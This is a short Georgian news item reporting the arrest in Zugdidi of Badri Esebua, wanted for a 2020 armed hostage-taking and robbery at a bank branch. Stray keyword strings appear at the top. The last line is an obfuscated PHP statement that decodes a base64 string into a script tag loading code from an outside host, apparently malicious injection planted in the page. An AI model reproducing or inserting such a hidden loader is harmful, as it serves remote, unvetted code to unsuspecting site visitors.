celsiusi
ავერსი საქკაბელი

ორწლიანი ძებნის შემდეგ, ბადრი ესებუა ზუგდიდში გამთენიისას დააკავეს. 

"მთავარი არხის" ინფორმაციით, ორწლიანი ძებნის შემდეგ, ბადრი ესებუა დააკავეს. გადაღებულ ექსკლუზიურ ვიდეო მასალაში ჩანს როგორ გამოიყვანეს ესებუა ზუგდიდის სამხარეო პოლიციის შენობიდან. ის, სავარაუდოდ, თბილისში გადმოჰყავთ.
ესებუა ზუგდიდში, გამთენიისას აიყვანეს, სავარაუდოდ, მაშინ, როცა აფხაზეთის დროებით ოკუპირებულ ტერიტორიაზე გადასვლას აპირებდა. 
სპეცოპერაცია ოპერატიული ინფორმაციის საფუძველზე დაიგეგმა. სამართალდამცავებს ჯერ კომენტარი არ გაუკეთებიათ. ცნობილია, რომ თბილისიდან სამეგრელოში ჩასული იყო სპეციალური დანიშნულების რაზმი. 

 
ესებუა 2020 წლის 21 ოქტომბერს ზუგდიდში, "საქართველოს ბანკის" შენობაში შეიარაღებული შეიჭრა და ათობით მძევალი აიყვანა. ის ნახევარ მილიონ დოლარს და ადგილის უსაფრთხოდ დატოვებას ითხოვდა.  ოფიციალური ინფორმაციით, მან ნახევარი მილიონი ლარი წაიღო და მიიმალა. შსს ამბობდა, რომ ის საქართველოს ტერიტორიაზე რჩებოდა და ქვეყანა არ დაუტოვებია.
წყარო: მთავარი არხი
763
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");